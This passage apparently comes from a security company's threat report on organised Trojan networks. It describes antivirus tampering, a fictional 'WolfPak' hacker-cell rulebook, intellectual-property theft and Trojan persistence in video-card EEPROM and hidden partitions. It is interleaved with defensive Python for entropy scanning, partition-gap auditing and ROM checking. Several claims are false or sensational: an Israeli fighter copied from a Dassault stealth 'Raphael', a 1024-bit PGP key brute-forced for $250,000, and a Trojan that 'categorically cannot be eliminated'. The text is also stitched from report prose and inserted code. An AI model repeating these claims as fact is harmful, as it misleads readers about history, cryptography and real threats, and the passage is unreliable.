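    print("captured sample:", scan(original))   # signature hit, low entropy
    print("packed variant: ", scan(packed))     # no signature hit, high entropy
```

The packed variant loses the signature hit but trips the entropy flag, which is why scanners pair such heuristics with unpacking rather than relying on byte patterns alone.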
Trojan Hunter screen shot: In order to find a Trojan it must already have been captured. Also
this software detects the Trojan only AFTER it has already run on your system.
Counter Measures
TDS3 A Trojan countermeasure program in action. One of the better systems on the market but
still vulnerable to new or mutated “Undetectable” Trojans.
Anti-Anti-Virus functionality.
We have mentioned how the Trojan Masters are quite able to design a Trojan that eludes all known detection systems, at least at first. We have also described how the Trojan can be cloaked to hide even from updated anti-Trojan software. However, there is a third technique, now a “standard feature” in all Trojan programs: active attack against the anti-Trojan software. The Trojan is designed to detect the presence of the anti-virus / anti-Trojan program and then attack the software. The capabilities vary from Trojan to Trojan and range in sophistication from the downright blatant deletion of a key file, resulting in an inelegant “crash” of the anti-virus software, to the subtle modification of certain signature files so that the anti-Trojan software has a “blind spot” enabling the attacker software to remain undetected. Some of the more sophisticated Trojans even go so far as to monitor anti-virus updates in order to preserve this blind spot. One suite went so far as to emulate the entire anti-virus program (though this proved to be untenable over the long term). Vanquish, a popular Trojan suite, boasts the ability to defeat 85 different anti-virus / anti-Trojan products.
The Security Community response
The security community, as a whole, is not prepared for this form of crime, inasmuch as it is not able to detect or eliminate these types of control and exploitation systems. Yet there is an element of the security community that is indeed aware of what is coming: those that call themselves “Grey Hats” (part-time hackers and full-time professional security consultants). There are, of course, White Hats, and certainly we are well aware of the Black Hat variety. The Grey Hats are in the curious position of being responsible for the computer security of the company which is paying their salary, yet on the other hand keeping on the inside of the Black Hat hacker community. This balancing act is made possible by the use of anonymous handle identification: John Smith by day and Phineas Phreak by night. In the persona of Phineas Phreak, the Grey Hat can keep abreast of the latest in hacking techniques while still performing his daytime duties as a security officer. This is the curious world of the hacker today; now let us consider tomorrow’s dilemma.
The Mature Hacking Corporation
Imagine for a moment an organization of hackers, hypothetical of course, with a structure consisting of a loose conglomeration of hacker “cells,” each cell consisting of 10-12 hackers having low to medium skill levels. Let us equip these would-be hackers, known in hacker parlance as “Script Kiddies,” with an easy-to-use hack-kit consisting of a suite of programs with a point-click-hack interface. Using this kit, the Script Kiddies can take over and manage a multitude of computers. They can play around a little with their victims; naturally any software that they may find is theirs to keep. Doesn’t this seem like an attractive proposition for the Script Kiddy? Indeed, they get a full suite of hacker software and virtually unlimited potential for obtaining free software.
Moreover, they are now part of a team; their ten partners, known to each other only by their hacker “handles,” form a mutual support group. They can exchange tips, news, gripes, etc. with their new peers. All communication is conducted anonymously via mailboxes posted on the victims’ computers; for live chat, the pro hackers have provided a victim-hosted chat room via NetMeeting. What fun! The Script Kiddy is in heaven, logging onto the chat room late at night to discuss with his secret cohorts the team’s latest conquests. Perhaps to turn their latest victim into a backup chat room, or an FTP site from which newly Trojanized victims automatically download the updates that further compromise their security, maybe even a source library in which to store the tools and hacker-ware needed for every eventuality, perhaps even a web site to which new victims can be lured for their dose of Trojan poison? The possibilities are endless!
Each group, of course, has a leader. These leaders, technical gurus, are rather more sophisticated than the Kiddies who will work for free software. These leaders are paid in cold cash, perhaps as a percentage of the “take.” But just what is the “take?”
The “Take” (Money to Be Made)
Large sums of money are involved in the higher echelons of cyber crime. Consider for example the design
specifications for the latest Intel chip which are at this moment resting on a server in San Jose, or the tool
design drawings for the next generation military advanced tactical guided missile carrier scheduled for release
two years hence, lying waiting to be copied on a workstation in Maryland.
The fundamental pre-patent design drawings for a revolutionary blue laser diode are to be found on a server
in Tokyo with 350 known vulnerabilities!
Or perhaps the marketing plans and release dates for a series of entertainment software titles would be of
interest to a rival company?
There are industrial spies and there are unscrupulous corporate “researchers” who are paid for the accuracy
of their predictions about the competitive market, without regard to the means of deriving that accuracy.
The Take - Continued
Consider how it is that the Chinese government is able to confidently pony up the tens of Billions of Dollars
required to build an advanced chip fabrication factory, despite the present absence of a chip design…
Chintel?
Yes, intellectual property theft is very big business. Consider the movie industry – every newly released
movie is for sale in Taiwan, China, and Korea for less than a dollar as a DVD or VCD disc, often weeks before
the premiere theatrical release.
What of the recent WTO membership by the Chinese? There is little hope of change. The Chinese premier
has been quoted, “It is difficult to change the habits of a people developed over a hundred years. We are
used to not having to pay for our video entertainment.” Furthermore, as it is obvious that any copyright
enforcement activities will be investigated and policed by the Chinese themselves, there is little incentive to
devote too many resources to protect the profits of the Hollywood conglomerates.
Hollywood has long given up on revenues from VHS and DVD sales in such countries. These losses, though
staggering in size, are built into their cost structure.
Similarly, in another intellectual property business, video games, a company creating a game with a development cost of 5-7 million dollars might see its latest release posted free of charge on a warez site, even while the master CDs are still being replicated prior to the official launch. Even with expensive copy protection, the video game industry never sells significant numbers in China and only expects to realize about ten percent of the potential sales in Eastern Europe. Similarly, for Korea, Russia, Vietnam, and several other non-Berne Convention countries, there are few revenues to be realized.
High-Value intellectual property theft - A case study:
The state of Israel is surrounded by hostile countries that have been equipped with the latest MiG-29 fighters from the Russian military establishment in exchange for hard currency and/or oil. Naturally, for its own national security, Israel requires “air superiority” fighter jets. The French company Dassault initially supplies these jets, specifically the “Mirage.” However, political tides change and the French, presumably under pressure from the Arab League, refuse to continue these sales and, more importantly, refuse to supply spare parts for previous sales. What to do? Build their own? But what of the airframe design and the design of the machine tools to build it? Fortunately for the Israeli nation, they have built up one of the best hacker teams in the world: a whole division of full-time Israeli army officers and talented national-service conscripts. Their military mission: to scour the world for data, design “gold.”
When the Dassault Company unveils their most advanced stealth fighter yet, the “Raphael,” they once again refuse to sell to the Israelis.
Just one year later, Israel test flies its own home-built fighter, the “Kafir.” Identical to the millimeter, with a few minor improvements. Nicknamed “Son of Raphael” by industry wits.
There is money, enough to finance a full-time team of technical helpers for “Script Kiddies”: SWAT teams to clean up their errors, quick-fix teams to deal with new situations, and a large development fund to assist the Trojan Masters in improving their core software.
Hackers Need Discipline Too
A competent pro-hacker can enlist droves of Script Kiddies with very little effort. But what good are hundreds of kiddies running amok in cyberspace? Without discipline, these kids will reveal themselves and their software to the security community, and then, before any real treasure can be found, the White Hats will move in and close all of the doors that the pros have worked so hard to open and preserve. No. There have to be rules, a code of conduct, rewards and punishments. In short, a structure. How do you inject discipline into such a mob of anonymous, unruly and clearly unethical louts?
With the support and infrastructure in place, expansion can be exponential. Script Kiddies are
“two-a-penny,” but there has to be a code of conduct – a rulebook. Let us hypothesize as to
what these rules might look like.
WolfPak
WELCOME TO THE PACK! You have already received your starter kit. Please be cautious with it. The kit has been personalized and assigned to you and you only; if it should get into the wrong hands, your kit will automatically let us know and you will be cut off from the pack, or worse, the pack may turn its guns on you! So keep it well hidden on the CD or in the hidden partition on your hard drive and never, never write down your password. Remember, just one slip-up and you will ruin the fun not only for yourself but also for the entire WolfPak.
Currently there are 356 known vulnerabilities in Windows software, 204 in MAC OS X, and 118 in UNIX/LINUX. Your scan kit can identify all of them and use any one of them to insert the starter Trojan into the victim. To select a victim, you can scan IP addresses randomly or target a specific IP address or web address. Either way it will only be a matter of minutes before you will have your first victim bagged! Good hunting, Wolf Cub!
INCLUDED IN YOUR KIT:
- IP address stealth scanner and vulnerabilities analyzer.
- Penetration launcher and Trojan inserter pack.
- Service & DLL Injector.
- Stealth Server modules.
- Manager control interface to view the status of your managed accounts.
- Distributed transaction co-ordinator to route your booty safely to you anonymously.
- Upgrade scheduler, lists the maximum speed of take-over allowed for each account.
Remember, we do not try to take over your victim too rapidly or the victim will notice the sudden change, if
they notice and start poking around, you may have to nuke them, and this is bad for business! Besides, too
many nukes and you will lose points with Doctor ToM (The Big Boss.) Points are earned by logging your
victims into Dr. ToM’s victim site. When the group reaches 1000 points, we are promoted and will be allowed
to get the next generation software (Which is even more awesome). If your individual scores are high
enough, you will be able to recruit a team of your own. Imagine having the loot from ten hackers dropped on
your machine each day. You will need a new hard drive! Now the rules:
WolfPak Rules
The Golden Rule: You must never reveal the software to anyone!
Once the starter Trojan is in, it will call you when it is ready. Do not try to move ahead before this.
You may toy with the victim, but only with approved tools. Never use your own or other hacker tools.
You must log on to one of ToM’s sites once every two weeks. Your victims will be automatically logged.
Never give your true name or personal data. Not even to a fellow WolfPak member. We are always
anonymous.
If you hit a problem with the software, call a NetMeeting, preferably on the victim’s system, and the Pak will help. In a real pinch we can call in a manager, or a hack-tech support guy.
If the manager thinks it’s worth it, he may call in a quick-fix team (usually to fix up an exposure issue). Don’t do this; it upsets ToM!
If your victim shows signs of catching on, put your software to sleep. The kit is totally undetectable in this
state.
If the hidden SQL database is exposed in any way, delete your software and nuke your victim immediately! If
you have any trouble removing your software, call in a manager.
Occasionally, a manager will request priority override and take a particular victim off your roster. If a
Manager says stay clear, STAY CLEAR!
Apart from that, All software you find is yours to keep!
That’s about it. Happy hacking, Wolf cub!
A scary scenario? Our hypothetical hack group could grow exponentially logging
hundreds, if not thousands of managed machines each week, becoming less easy
to detect as more experience is gained in the field. Lucky for us, this is just a
fantasy…
High-Value Intellectual Property in today’s connected World
By way of an example of high-value Intellectual Property (IP), we will examine the issue of compressed theatrical films (the very property which was the subject of LoudWolf’s initial research).
A compressed movie is small, yet maintains all the quality of the studio master. It is intrinsically a high-value item for a Cyber Pirate, who can use such a high-quality master to create DVDs, VCDs, and other physically distributable copies. More likely, however, since a compressed file can be distributed via the Internet at speeds better than real time, the pirate would opt for electronic re-distribution. The initial thieves will be able to charge for the property at first, but sooner or later a leak will occur and the property will become freely traded over the Internet, essentially becoming public domain from there on. The Cyber thief makes a small profit; the property owner faces a catastrophe!
Imagine if you will, a library of all Disney movies resting on a server somewhere, earning money both for the
Internet operator and the studio. Now imagine that one of our WolfPak members stumbles upon the server to
discover a goldmine of IP. In less than 24 hours, all of the property will have been copied off the servers and
within a few more days, it will be traded across the globe as a freely “swappable” item. The future income
potential for the entire library has been all but wiped out! A disaster for the studio and the Internet operator.
We call this scenario “A catastrophic-loss.” Once lost, it is lost forever. A single occurrence is all it takes.
Consequently, we have to design a system that prevents even a single loss, not one, not ever, not even
99.9% secure. The system must be absolutely secure – 100% and nothing less is acceptable.
This catastrophic-loss potential, has the effect of nullifying the income potential of the property. The fear of
such a loss, in many cases, prohibits certain uses of the property. In the case of the movie industry, the fear
of such catastrophic-loss has prevented the development of movies-on-demand over the Internet for many
years.
There are a wide variety of properties that fall into the category of High-Value IP. In general terms, when the potential for loss has huge consequences, it has a powerful restraining effect on technological development. This restraint has been in place for many years now, ever since the “Napster Debacle” deflated the music industry’s profits. Currently, in all areas of industry where high-value intellectual property is the “stock-in-trade”, the owners of these properties have been both unwilling and unable to take advantage of the Internet revolution and realize potential profits from their properties in the “connected” World, preferring to keep their property on low-tech media and continuing to utilize traditional distribution methods. Some examples of these industries are:
Music
Movies
Television
Book publishing
Educational curriculum publishing
Professional training
Magazine publishing
News Paper publishing
Digitized art
Statistical research
Scientific data
Secure communications
Industrial design data
It is not difficult to understand why industry is fearful of entering into markets where their valuable IP is put at risk. Imagine the industry executive charged with evaluating the risk in the face of the following “Hacker quotes”.
Hacker Quotes.
Some of the more memorable quotes regarding security of computer systems made by the hackers
themselves.
“No security is absolutely foolproof, the best you can ever hope for is to have a system that is so costly to hack that the reward does not justify the effort.”
“Obscurity is not security, merely burying the property deeply using tricky algorithms and bolstering up your chances of remaining obscure by surrounding the valuable property with lots of ‘chaff’ will not hold up for long. In fact the time to discover and steal for this type of system is less than the time spent to obscure and hide the property. Especially if you have a rough idea of what you are looking for!”
“Cryptographic solutions will never work. All codes can be broken; the cost for breaking a
PGP 1024 bit key is currently running about $250,000. If I want to break your code that
much I just have to pay that much. That is how much it costs to try every possible key in the
1024 bit key space, likelihood is it will crack at half that price.”
“So-called unbreakable crypto is not! It is just not used enough for someone to bother with.
And by the way, real hackers don’t let you know that they have broken your code.”
“In over a decade of hacking it has never been necessary to break into crypto. It is much,
much easier to break into your system and steal your crypto keys.”
“If the strength of the cipher used in the cryptographic algorithm is strong, then the code will
be cracked only by brute force methods like trying every possible key but it will indeed be
broken. The only way to make breaking of the code less likely is to make the key long
enough so as to make the breaking of the code ‘computationally infeasible’. Even then, it is
merely a deterrent, as computers get faster all the time what was once computationally
infeasible becomes trivial.”
“Crypto, Real Crypto, is hard. I don’t bother with it. I can get anything I want, any time. The
only thing that ever stops me is when I see custom error messages, that spooks me a bit.”
“I swiped the private key the moment it was made, the keylogger sniffed the pass-phrase so
I got it as it was typed but I don’t need all that stuff coz the document was lifted off the
system before it was encrypted.”
“OK so you are using an international version of PGP and you have got 4096 bit keys. Pretty
good, huh? And you are going to send the key over the wire with the data? That may pose a
problem.”
ANALYSIS OF CURRENT HACKER SOFTWARE
Analysis of current state-of-the-art hacking software reveals several startling new discoveries, with serious
consequences for the security, system software and computer hardware industries.
Purpose of this Document
In order to better appreciate the current and future demand for a new generation of security related
products, we must first understand the nature of the security threat. Our security products have been
described as, “innovative,” “thorough,” and “comprehensive” by various security experts. In more informal
feedback we have received comments such as, “they have gone to extreme lengths to secure the data” and
even, “excessive security measures are implemented…”
We will describe in this document many of the sophisticated methods hackers now use as well as others that
are, “on the technological horizon.” Then, by extension, we will describe the future challenges we must
address. Our security solutions are tailored to meet these challenges, using several new and unique
techniques. Our methods, incorporated as they are into comprehensive security solutions, are neither overly
cautious nor excessive; they are the natural and inevitable consequence of a considered response to the
burgeoning threat. In other words, these products were born out of necessity to combat real attacks.
The newest generation of hackers has been able to consistently breach or circumvent traditional concepts in
security. Patches, updates, and service releases are after-the-fact “catch-ups” to the hackers’ dominance.
We have no choice but to engineer a paradigm shift. Our mission is to achieve this shift while incorporating
the legacy and reality of the computing world. Our products cover many areas of security, ranging from the
high-end military to our consumer “peace-of-mind” products. Our products are designed to unobtrusively
move current “permissions based” security to a “process based” paradigm. Other products address a shift
from software-based integrity verification to a hardware system. Still, more of our systems shift us from a
software certificate (Network of trust) type system to a positive recognition system.
We have developed numerous sub-systems and products in addition to those based on the “design shift”
described above, again out of necessity. The driving force behind all of our products is the recognition of one
simple truth:
Current security systems and existing architectures are no longer considered secure!
A well-designed and fully hardened system using current best practices can be compromised. All of our best
security efforts to date amount only to raising the degree of skill required to break in. However, in the world
of software, such skill may be easily and quickly acquired by the use of professionally designed hack-tools.
Moreover, the ranks of these “tool users” are growing. As we will describe, the combined skills of these tool
users, when marshaled together and coordinated effectively, present a threat not only to individual systems,
but to entire networks, including small companies, large companies, and even entire business sectors.
Cautionary Disclaimer
The expression, “your mileage may vary” was first promulgated as an innocuous piece of “legalese” by the
American motor industry. It was intended to curb the number of lawsuits regarding actual miles-per-gallon
engine performance experienced by customers versus the stated average performance as tested by the car
maker under, presumably, ideal conditions. These days, the expression has all but been forgotten except for
certain segments of trade who have persisted in applying this “catch phrase” to their own line of work.
The software industry uses the phrase as a post-script caution and general disclaimer of responsibility. In the
software industry, “your mileage may vary” has become a wry comment often attached as the last line of any
specific troubleshooting recommendation.
The “your mileage may vary” statement is most applicable in the context of describing the effects you might
see in a computer system as it is “taken over” by the team-operated hacker software described in this document. It is
most appropriate because this software suite is designed, or rather has evolved, to be both infinitely flexible in
its operational capabilities and stunningly unpredictable in its sequencing and approach. The reader must
understand that we are describing a relatively new phenomenon in the software business— that of the
database-driven, semi-autonomous suite of scriptable modules deployed and delivered to the target by
means of asynchronously scheduled and non-guaranteed delivery protocols. What a definition!
Nobody, not even the author-attacker can accurately predict the attack pattern. He sets up the rules, designs
the goals, and assembles the tools and modules, but the active software itself makes many decisions as well.
Moreover, the attack is deployed, programmed and controlled by teams that may have widely differing goals
and morals. Traditional software analysis in the formal manner would be quite convoluted, i.e., a series
of linear statements along the lines of:
This is what it does first…
Here is the filename, the function calls, the methods used, and the results returned
This is what it does next…
More file names, function calls, methods and results…
This form of analysis would be a ludicrous folly if applied to the monster of a package we are dealing with
here. A linear analysis statement such as the one above would run several hundred pages and then only
serve to describe one out of the thousands of equally possible through-lines of action. Effectively assessing
this new phenomenon requires new and innovative analysis tools, tools we spent months developing. And
even with these tools, it took us many more months of intense research to reach the point where we
could lay open examples of the captured software and fully document its capabilities.
Design Rules as a Way of Describing Software Functions
The presentation of software functionality by way of a series of assumed DESIGN RULES will be used
throughout this document. This method is preferred since it expresses a general trend of functionality as
observed during many tests, rather than specific functions which would be too numerous to describe. We will
describe a rule only if we have seen a statistically clear majority of tests trending towards a particular goal.
This goal then leads us to formulate a set of hypothetical design rules. These derived rules may bear no
resemblance to any actual design methodology. However, they seem to be both consistent with the
observable facts and have already proven to have a great deal of predictive accuracy. The rules method is a
convenient form of shorthand, which not only reduces the required volume of documentation, but also, goes
some way towards providing the data we have used to anticipate likely next steps in development of this
entire class of software.
Engineer’s Notes on Descriptive Style
We must apologize in advance for the rampant anthropomorphism expressed from time to time. We know
that most of the time we are dealing with a software ROBOT (or BOT), but since a well-established Trojan
exhibits behaviors that are highly responsive to software challenges and interacts closely with us as we
experiment, it is inevitable that we imbue these BOTs with all sorts of emotions and planning capabilities,
which they clearly could not possess.
All other deviations from a strict scientific software analysis are entirely contrived since we are not trying to
present a scientific analysis. There are plenty of facts to be digested here in this summary and there is ample
statistical data in the full lab data to support all the conclusions, opinions and guesses presented here with
full scientific rigor. In a first draft of this document we gave in to the temptation and supported every
reasonable opinion with a bucketful of factual data and a statistical proof. Needless to say it read like a
Chinese phone book!
Deadlines compel us to abandon such rigor and submit this document, dubbed internally “The Backlash”. No
statistics, no software listings, just the bare facts along with the “Corn Ball” engineer humor (which was left
in to up the page-count a bit). We will attempt to make what would otherwise be a dry, sometimes chilling
and technically difficult description more accessible to the non-computer-professional. Corny titles and hints
of (nay, outright) sarcasm throughout the remainder of the software analysis are to be expected.
The Threat, an Overview
General Description, History and Development Status
The latest professional hacker software is a virtual, “Swiss army knife” of carefully selected modules. These
modules are capable of scripted database-driven operations. The controlling database is held locally on the
victim’s system, which in turn, is directed by its human manager via any one of a vast array of
communication protocols - some common, others remarkably obscure. The database can operate
autonomously, as it is capable of goal-based heuristics or rule-based decision making. The software is
revolutionary in a number of areas of functionality by means of its powerful and flexible modular structure.
Specifically, its ability to detect known threatening programs and situations, as well as respond intelligently
and dynamically to the ongoing situation, bringing to bear important new technologies in a coordinated
manner.
The information relating to specific patterns of software behaviors, the goals of the Trojan Masters, and the
functions and methods used, will be presented as accurately as possible with the assurance that all
functionality described has been observed and documented during the course of our research. However, it
must be understood from the outset, that we will inevitably describe a “superset” of the features that any
individual single system may experience “in the wild.” Furthermore, we are certain that there is more
functionality out there that we have not yet seen on any of our test systems.
Also note that the particular combination of installed features used, and the order in which the behaviors are
manifested are, in part, automatically selected by a rule-based system of stored procedures, which select
components according to the equipment and status of the target machine, and are partly manually-directed
according to the whim of the hacker-manager. Suffice it to say that, “your mileage may vary,” should be
assumed to have been added to the end of every functional description in this document.
Software Goals
Total control of all aspects of the target machine’s functions, data, and operations is the primary goal.
Achieving this goal incrementally over time, without the knowledge of the target user, is the primary
directive. Secondary functions include, but are not limited to, the extension of the controlled namespace by
means of redirecting the target machine’s computational resources towards the provision of database,
connectivity and bandwidth resources in support of the takeover of additional targets. The tertiary goal is to
enable the clandestine use of captured namespace and bandwidth capabilities, to be sold to parties that may be
interested in low-cost or anonymous bandwidth having the additional feature of being non-traceable in both
directions. Other tertiary goals have been noted, including scanning for high-value intellectual property and
subsequent theft; and installation and operation of anonymous web servers, email servers, video servers,
voice-over-IP services, application servers, and FTP sites. Scans for financial data, and attempts to use the
data acquired to authorize direct money transfers, have occasionally been observed.
Overview
The various elements that make up the entire suite of hacker software are formulated, to a greater or lesser
extent, under a common design philosophy. We do not have access to a design document; indeed nobody
does, as this software was not designed by an individual or small group. This very special suite of software
has been “evolved” over the Internet. Evolved by an unknown number of anonymous individuals who
themselves could never know the number or names of other contributors. The software is an amalgam of
evolving elements, ever-changing, with various modules being revised, improved and replaced on a weekly
basis. Major overhauls tend to take place about once every two months, while older versions may continue
in active use or evolve in different directions. There is not a definitive current suite, yet as nebulous as this
may sound, it is still quite possible to discern its overall structure and functionality, and even hazard a guess
as to the design rules by means of a careful analysis of a great many variations.
For example, one Trojan is delightfully adept in the utilization of a previously unknown and major design
weakness located in the disk caching systems found in all modern computer systems. The Trojan uses this
important design flaw to give itself the ability to disappear entirely when it senses a threat or other
dangerous activities. This exploit is a huge security gap and an important security issue in itself. An
impenetrable hiding spot large enough to conceal a large Trojan and effective enough to withstand an
exhaustive search using the best discovery tools available is quite a novelty, to say the least.
The same dynamic and intelligent application of novel technologies is exhibited if the Trojan is somehow
detected and an attempt is made to eliminate the offensive “Mal-Ware.” The Trojan’s response is a Pandora’s
Box of clever tricks, which nullifies the standard IT department’s progression of “cures”.
One version of the Trojan evades all cures! It categorically cannot be eliminated!
Nope…
No…
Never…
Not even with that!
HEY BUDDY! Just what part of the statement:
“IT CATEGORICALLY CANNOT BE ELIMINATED!”
are you having trouble with?
Standard Information Technology Procedures (With Escalation) on a Trojaned System
So you call in your IT guy to perform a checkup because your computer’s been acting “funny”. Here is an
example scenario.
Step 1
Alternate A
Action: Run virus checker
Result: It is not a virus. The checker finds nothing. The IT guy leaves.
Action: Update checker & run
Result: It still is not a virus. The IT guy leaves, annoyed.
Alternate B
Action: Run virus checker that scans for suspicious activity.
Result: The Trojan has modified the virus checker. IT guy leaves.
Action: Update checker & run again.
Result: The Trojan simulates the update; the checker, of course, finds nothing amiss.
The IT guy leaves.
Step 2
Action: Re-install all applications from original disks.
Result: The Trojan intercepts install and redirects installer to
install a Trojan-approved custom version of the application.
Step 3
Action: Re-install OS and applications
Result: The Trojan survives the IT guy’s nuke, handily hidden in protected havens:
secret RAM drives, locked page files in memory, hidden & compressed
dblspace drives, locked memory areas allocated to the disk cache, a large
pagefile.sys or hiberfil.sys file saved to the hard drive, or a hidden and
compressed area of an IBM OS/2 formatted disk space divided into 8 different
areas, each only accessible via either encrypted access through a secret
“named pipe” or by means of one of several possible distributed transaction
database protocols.
A Scenario
A chunk of hard drive space has been allocated by folks other than yourself, causing your hard disk to be a
little smaller than it should be. By some miracle you noticed it and you just happen to have the time and the
skills required to perform an investigation.
Looking at your hard disk statistics you find X bytes used and Y bytes free. Adding these two numbers reveals
the capacity of your hard disk drive, and you find a little less than you thought you should have. Checking the
literature for the hard disk drive confirms the fact that you have about 2 megabytes less than you ought to
have!
This space will certainly stay allocated to others until you can figure out the following:
- That the hard drive is in fact a treacherous liar, in that it has for some time been progressively
deceiving the operating system and purposely under-reporting its true size.
- Why the hard drive is lying about how big it really is, and how to persuade it to tell the truth.
Or:
- Forget about why the treacherous disk is treacherous, and figure out how to persuade the format
and fdisk programs to stop believing the darn thing and erase it, all of it! Yes the whole darn
thing!
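The capacity arithmetic in the scenario above, carried out against a partition table, as an added example that is not part of the original document: it parses a classic MBR, sums the partition extents against the drive's reported sector count, and reports any unallocated region large enough to matter. The 8 GiB geometry, the partition layout and the 2 MiB shortfall are constructed for illustration; this only reveals space missing from the partition map, so a drive that under-reports its own capacity still has to be compared against the vendor's datasheet figure, which `capacity_shortfall` does with values you supply.

```python
import struct

SECTOR_BYTES = 512
MBR_SIGNATURE = b"\x55\xaa"
# One 16-byte partition entry: status, CHS start (skipped), type,
# CHS end (skipped), start LBA, sector count.
ENTRY_FMT = "<B3xB3xII"


def parse_mbr(mbr: bytes):
    """Return (status, type, start_lba, sectors) for every populated entry
    in the four-slot primary partition table of a 512-byte MBR."""
    if len(mbr) < 512 or mbr[510:512] != MBR_SIGNATURE:
        raise ValueError("not an MBR: 0x55AA signature missing")
    entries = []
    for slot in range(4):
        status, ptype, start, count = struct.unpack_from(ENTRY_FMT, mbr, 446 + 16 * slot)
        if ptype != 0 and count != 0:          # empty slots are all zero
            entries.append((status, ptype, start, count))
    return entries


def find_gaps(entries, total_sectors, min_gap_sectors=2048):
    """Return [(start_lba, length)] for regions of the drive that no partition
    covers. Sector 0 holds the MBR and a small alignment gap before the first
    partition is normal, so gaps below min_gap_sectors are ignored."""
    extents = sorted((start, start + count) for _, _, start, count in entries)
    gaps, cursor = [], 1
    for start, end in extents:
        if start - cursor >= min_gap_sectors:
            gaps.append((cursor, start - cursor))
        cursor = max(cursor, end)
    if total_sectors - cursor >= min_gap_sectors:
        gaps.append((cursor, total_sectors - cursor))
    return gaps


def capacity_shortfall(reported_sectors, datasheet_bytes):
    """Bytes by which the drive's self-reported size falls short of the figure
    in the vendor literature; a positive result deserves a closer look."""
    return datasheet_bytes - reported_sectors * SECTOR_BYTES


def audit(mbr, total_sectors):
    """Combine the partition-map checks into one report."""
    entries = parse_mbr(mbr)
    gaps = find_gaps(entries, total_sectors)
    return {
        "partitions": entries,
        "gaps": gaps,
        "unaccounted_bytes": sum(length for _, length in gaps) * SECTOR_BYTES,
    }


def build_mbr(partitions):
    """Construct a 512-byte MBR from (type, start_lba, sectors) tuples.
    CHS fields are left zero; this is test data, not a bootable disk."""
    mbr = bytearray(512)
    for slot, (ptype, start, count) in enumerate(partitions):
        status = 0x80 if slot == 0 else 0x00
        struct.pack_into(ENTRY_FMT, mbr, 446 + 16 * slot, status, ptype, start, count)
    mbr[510:512] = MBR_SIGNATURE
    return bytes(mbr)


# Constructed sample: an 8 GiB drive whose single NTFS-type (0x07) partition
# stops 4096 sectors (2 MiB) short of the end, mirroring the scenario's
# "about 2 megabytes less than you ought to have".
TOTAL_SECTORS = 8 * 1024 * 1024 * 1024 // SECTOR_BYTES
HIDDEN_SECTORS = 4096
DEMO_MBR = build_mbr([(0x07, 2048, TOTAL_SECTORS - 2048 - HIDDEN_SECTORS)])

if __name__ == "__main__":
    report = audit(DEMO_MBR, TOTAL_SECTORS)
    for start, length in report["gaps"]:
        print(f"unallocated: LBA {start}, {length * SECTOR_BYTES} bytes")
    print("datasheet shortfall:", capacity_shortfall(TOTAL_SECTORS, 8 * 1024 ** 3))
```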
NOW, BRIEFLY, WE WILL EXAMINE THE SPECIAL CASE OF “IF YOU WANT TO READ THE SNEAKY FILES NOT
JUST ERASE THEM!”
All the files are not only encrypted, but password protected, written in a Unicode font which has been
scrambled using an in-memory code page index which you cannot access because it is so severely locked by
constant cache hit locks that not even the processor can get a look at it. Besides, all files will look like
nonsense unless you know the font name, the font language, and the font size with which the original was
scrambled. No don’t bother plodding though all 300 styles, 6 languages and all 30 sizes of each that you do
have. The Trojan makes up its own and you definitely don’t have it.
Besides, all the programs are written in an obscure dialect of Swahili using a virtually unknown programming
language that you don’t know called object-orientated D++ which intrinsically saves its files in irrecoverable
opcode mode and uses disk space sideways 1 bit per track using 32 bit words encoded as binary-coded
decimal in sixteen four-bit words, each 32 bit word using reverse Polish notation with alternating signed and
unsigned integers.
If you haven’t already noticed, the above paragraph is a joke, although certainly in the same vein as all the
other protections built around the secret stuff all of which are simplified explanations but nevertheless true!
The point is, there is a valid reason why this stuff is tough to crack and, with the exception of present
company, still secret.
BACK TO THE IT GUY WHO IS NOW QUITE CONVINCED THAT YOU ARE NUTS!
HOWEVER, HE WILL BLAST AWAY AT THE TROJAN JUST TO HUMOR YOU.
Step 4
Action: Repartition hard disk drive, format disk, initialize with a military grade secure
erase. (You are impressed, yes?)
Re-install operating system from original disks.
Re-install all application programs from original disks.
Result: The Trojan holes up in a combination of EEPROM on the
video card and a secret portion of hard disk space hidden from the operating
system. After the dust settles, it will re-emerge unscathed! And at the first
opportunity access the Internet and re-build any programs the IT guy’s
efforts have managed to erase.
All seems well. The IT guy leaves having delivered the IT equivalent of a software neutron bomb.
Nothing ever has, or ever could survive such an onslaught. Besides, the user has gone NUTS! The IT guy
has never seen any of the quirky little things reported and each time he leaves, everyone agrees everything
appears normal. In his mind, there was nothing wrong with the system in the first place, but now, post-neutron-bomb, there is no question about it! If this guy calls a fifth time he is certifiably nuts!
RING… RING…
You:
“Err Hello, look, I know you were just down here, but this machine just accessed the network
and transferred a whole bunch of files to what seems to be a synchronized share folder. I
wonder if you could take a look at this, the data on this machine is really important stuff!”
IT Guy:
“LOOK MISTER! If you think you are going to get me down there on another of your ‘It does
weird things’ reports, you are very much mistaken. You are nuts! Your machine is fine! It’s
your head that needs a tune up. If you would care to demonstrate one of these err... quirks,
I’ll be right over.”
You:
“But it’s random. It does this weird disk access stuff and seems to use the Internet at odd
times. There’s no pattern to it.”
IT Guy:
“Well of course there is no pattern to it because it doesn’t exist! Looking forward to your
‘demo’ of the problem… someday. Goodbye!”
CLICK!
The Trojan has eluded all of the IT guy’s attempts to eradicate it: in this example, virus checkers, reinstalls and even full (military grade) disk erasure.
How It Was Done
The Trojan can withdraw when threatened, placing its code and databases into a hard disk partition which is
hidden from view, invisible to Windows and even DOS. This partition is accessed by the core Trojan program
by means of named pipes and exposed com controls. The core Trojan program is small enough to reside in
the excess space at the end of a programmable chip, (EEPROM in this example) that belonged to a VGA
graphics card installed in the machine. In this hidden state, the Trojan exists in hibernation where it can stay
indefinitely. In the example scenario the Trojan re-emerged immediately. (Not a stealthy move, by the way.)
The re-boot of the machine after the re-install by the IT guy executed the Trojan core module in the
computer’s memory which contained a (quite normal) shadow copy of the video BIOS software contained in
the EEPROM. A two-byte “tweak” in the standard BIOS is all it takes to execute the core Trojan code that
was added in to an unused piece of the chip illicitly while the machine was previously compromised.
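A defender-side integrity check for the kind of video card option ROM image just described, added here as an example (not the document's code and not any vendor's tool): it validates the legacy 0x55AA header and the 8-bit checksum the system BIOS itself applies before running an option ROM, then compares a SHA-256 of the image against a baseline recorded from a clean card. The ROM image is constructed and non-functional, and `patch_and_rebalance` is only a test vector showing why the checksum alone would not notice a small “tweak”; reading the real image out of the EEPROM is left to whatever dump utility the card's vendor provides.

```python
import hashlib

ROM_BLOCK = 512


def rom_length(image: bytes) -> int:
    """Length in bytes declared by the legacy option ROM header: bytes 0-1 are
    the 0x55 0xAA signature and byte 2 is the size in 512-byte blocks."""
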